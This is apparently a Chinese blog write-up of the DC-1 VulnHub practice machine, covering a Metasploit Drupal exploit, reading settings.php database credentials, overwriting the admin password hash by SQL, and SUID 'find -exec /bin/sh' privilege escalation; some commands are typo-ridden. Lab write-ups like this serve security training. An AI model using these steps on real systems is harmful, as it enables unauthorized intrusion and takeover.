dc-1靶机

最新推荐文章于 2024-09-08 16:25:03 发布
最新推荐文章于 2024-09-08 16:25:03 发布
阅读量198 收藏
点赞数 1
文章标签: linux 网络 安全 web安全 测试工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_64809022/article/details/131436151
版权

1.启动kali,使用nmap扫描。

 2.访问靶机地址

nmap:                                                                                     

使用nmap带参数的扫描

nmap -A ip -p0-65535

 确定该站点的 CMS Drupal 

使用msfconsole工具,运行MSF

使用网站的cms信息,在MSF中使用search drupal

 3.找到了两个与 http 相关的模块,根据 Rank(等级)优先选择带颜色的模块,使用 use 2 装载模块。

4.使用 show options 查看需要进行的设置,发现只需要设置 RHOSTS(目标),所以使用 set RHOSTS

 使用run运行模块

运行模块后,成功建立会话,使用shell即可拿到靶机的webshell

使用whoami查看当前用户的权限。

 

4.为了方便后面的操作,使用 python -c "import pty;pty.spawn('/bin/bash')" 实现交互式 Shell

交互式 Shell:可以执行一些需要上下文的命令,并且会显示操作的结果。

 使用 ls -al 浏览当前目录中所有的文件及其权限

 发现了flag1.txt,并进行查看

每一个好的cms都需要一个配置文件,你也一样。

5.根据文件内容,百度搜索 Drupal 站点的默认配置文件,得知文件名为 settings.php

6.先使用 find /var/www/ -name settings.php 在网站目录下搜索 settings.php 文件。

7.成功搜索到settings.php 使用cat /sites/default/settings.php进行查看

 

8.查看后发现这个文件就是我们要找的第二个 flag,并且还发现了靶机数据库的账户和密码。

9.使用 mysql -u dbuser -pR0ck3t 尝试登录靶机数据库。

 

 10.登录成功后,使用databases查看所有的数据库

11.根据库名进行判断,drupaldb 应该是靶机的 Drupal 站点使用的数据库。

14.12.使用 use drupaldb; 进入数据库,然后使用 show tables; 查看当前数据库中的所有表。

 

13.浏览表名后,发现一个 users表,猜测其可能保存着网站用户的信息。1

14.使用select * from user/G,纵向显示users表中的数据

 

15.找到了 admin(管理员)账号的密码,根据密码形式可以得知密码经过了加密。

16.得到密码密文后可以尝试进行解密或修改密码,搜索资料后发现这种加密是不可逆,并且 Drupal 提供了可以直接修改管理员密码的方法。在 /var/www/ 下使用 php scripts/password-hash.sh tkm 即可,生成tkm,这个字符串对应的hash值。

 17.再次进入到数据库中,使用update drupaldkwsens set pass="hashwherecname='admin'即可修改admin的密码为之前生成Hash时使用的字符串,此处为tkm。

update drupaldb.users set pass="$S$DZhMUD9bEhyn4XKcfHQB3MzY19aFgUwBWbKLRCiv6eDD2llXybHv" where name='admin';
select * from drupaldb.users where name='admin'\G;

 18.尝试使用admin:tkm登陆

19.成功使用管理员账户登录站点,看到最上方有一排选项,如果看不懂,就都试一次。

 

 

 特殊权限将有助于查找密码 但您需要exec 命令才能确定如何获取阴影中的内容

21查看后发现文本内容中有两个特别的大写字母perms和find,根据此前flag的形式,使用find /name“flag*" 搜索所有开头为flag的文件。代尝试点击 Dashboard 选项,找到了 flag3.txt ,点击进行查看

 22.成功找到flag4,并查看cat /home/flag4/flag4.txt

您可以使用相同的方法在root中查找或访问标志吗 

23.根据 flag4.txt 中的内容,推测下一步需要进行提权,从而获得 root 权限,并访问 /root 目录,获得 flag5

24.根据 flag3 中另外一个大写字母 perms ,猜测可能需要使用 SUID 提权,使用 find / -user root perm -4000 -print 2>/dev/null 查找所有具有 SUID 权限且属主为 root 的文件。

find / -user root perm -4000 -print 2>/dev/null

25.发现了 find 命令,并且根据 flag3 中提到的 -exec,可以确定需要使用 find 提权。

26.使用 touch tkm 创建提权需要的文件,然后使用 find tkm -exec '/bin/sh' \; 进行提权。

  

 27.成功获得root权限,根据提示使用cd root访问/root目录,找到了thefinalflag.txt文件并查看。

做得好!!!!
希望你喜欢这个并学到了一些新技能。“您可以通过年witter与我联系,让我知道您对这段小旅程的看法@DCAU7

wsy678
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
DC-1靶机渗透笔记
qq_60600840的博客
08-08 214
DC-1靶机安全、渗透、靶机
dc-1靶机实战详情(新手)
kyp_1994的博客
08-28 1124
dc-1靶机详细获取flag过程新手勿喷
DC-1靶机提权root
真正的大师,永远都怀着一颗学徒的心。
07-21 765
文章目录前言一、查看当前权限二、suid提权总结 前言 提示:上一篇介绍了怎么反弹shell,点这里可以查看,本篇文章将介绍怎么提权到root用户 一、查看当前权限 1)反弹shell后我们首先要做的事就是查看当前用户的权限。 2)输入该命令来得到交互的Shell,一般的系统都默认安装python python -c ‘import pty;pty.spawn("/bin/bash")’ 3) 我们当前的用户权限由于不是root,所以很多文件看不了,因此我们要进行提权操作 二、suid提权 1)
DC1-9靶机提权总结
问彡心的博客
09-27 1754
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
DC-1渗透实战
weixin_60719780的博客
04-05 408
目标机:192.168.26.161攻击机:192.168.26.144。
# 【oscp系列】靶机1
weixin_44807430的博客
01-15 830
快速打通靶机
复现DC-1靶机.pdf
03-22
1. 使用虚拟机(VM)技术进行靶机复现:文档描述了如何通过虚拟机安装和打开一个名为DC-1的靶机(靶场),具体是指利用VMware这样的虚拟化软件来加载一个名为DC-1.ova的虚拟机文件,从而建立一个安全的测试环境。...
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-1 靶机安装及练习
weixin_45451139的博客
01-24 2051
1. 靶机下载安装 下载地址:DC-1 下好后,进行解压,得到一个 .ova 文件, 注意导入后将虚拟机的网络模式由桥接模式改为NAT模式 安装好后虚拟机界面如图: 2. 进行练习 2.1获取flag1文件 首先打开kali机,因为该靶机和kali在同一网段下,因此现在kali中输入ifconfig 进行查看kali机所在网段 由图可知,该kali机ip为192.168.220.128, 因此所在网段为192.168.220.0 然后,用nmap进行扫描该网段: nmap -sP 192.168.2
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2793
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
学习笔记2@靶机安装以及设置
weixin_45575289的博客
02-18 1069
** 1. 环境准备 ** OWASP靶机下载 OWASP是一个安全组织,我也是刚开始接触相关知识不久,owasp靶机上面存在着大多的已知漏洞,我们可以通过上面很多的漏洞对它进行实验,加深我们对渗透知识的理解。 OWASP下载教程 进入OWASP的官方网站找到相应文件进行下载: 建议用7z的那个版本,相对快一点。我下了一天一夜我丢! 当然还有网盘链接:https://pan.baidu.c...
OWASP靶机搭建
weixin_30364325的博客
05-26 2066
owasp靶机应该是每个渗透入门乃至一些高手的一个试炼地之一,以下是我在靶机上搭建虚拟的方法。1.虚拟机安装在这里我用的是VMware14,靶机自然也是VM的。软件安装基本也是没有什么可讲的,安装过程中电脑重启为正常程序。下载链接【0ey4 】2.owasp靶机下载下载链接3.owasp靶机打开在第二步链接打开之后,将会下载到一个文件将其解压之后先放着,所放的盘建议有10G以上的内存。然...
OWASP靶机搭建(新手也可)
m0_51521509的博客
03-09 3012
OWASP靶机 进入官网地址下载 https://sourceforge.net/projects/owaspbwa/ 点击download下载[外链图片转存失败,源站可能有防盗在这里插入!链机制,建描述]议将图片上https://传(imbg.csdnimg.cG/2028lo6nK10309174627848.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpd...
Pikachu漏洞练习平台(一):本地靶机环境搭建(Linux平台)
YING0x00的博客
08-16 6178
所需工具: Pikachu靶机 下载地址:https://github.com/zhuifengshaonianhanlu/pikachu XAMPP 下载地址:https://sourceforge.net/projects/xampp/files/ 提醒,请进入上面XAMPP地址后选择linux版本下载,否则可能会因为墙的原因无法下载(这是本人踩了无数次坑得出来的,可以尝试不用这个网址下载,相信你会回来找这个地址的,得瑟~~~),数据库使用的是mysql,因此运行Pikachu你需要提前安装好.
如何使用virtualbox打开vmdk格式(vmware)的硬盘文件的靶机
热门推荐
qq_33163046的博客
06-04 1万+
靶机:dpwwn: 1(来源www.vulnhub.com) 1. 打开virtualbox。新建虚拟电脑,填写靶机名称,文件夹默认,类型linux,版本随便。 2. 内存,默认。 3.虚拟硬盘,选择“使用已有的虚拟硬盘文件”。右击右下角图标,选择注册,添加vmdk文件。 4. 设置-网络设置:选择host-only方式连接。 5. 设置-存储:在“IDE控制器”右击添加vmdk文件,若“IDE控制器”下方还有“控制器SATA”,可以删除“控制器SATA”。(这是本博客的重点)
Linux 进程控制
最新发布
2302_77289177的博客
09-08 839
Linux 进程控制
【运维监控】prometheus+node exporter+grafana 监控linux机器运行情况(2)
alanchanchn的专栏
09-03 2201
本示例是通过prometheus的node exporter收集主机的信息,然后在grafana的dashborad进行展示。本示例使用到的组件均是最新的,下文中会有具体版本说明,linux环境是centos。本示例分为四个部分,即prometheus、grafana、node exporter的部署和三者集成的监控linux。本文旨在说明三者如何使用,不涉及各自组件的介绍,如果需要使用到本文的,肯定都有了解。
高效诊断Linux性能问题
Tiger93的博客
09-08 195
诊断Linux性能问题
渗透DC-1靶机设计思路
05-24
1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值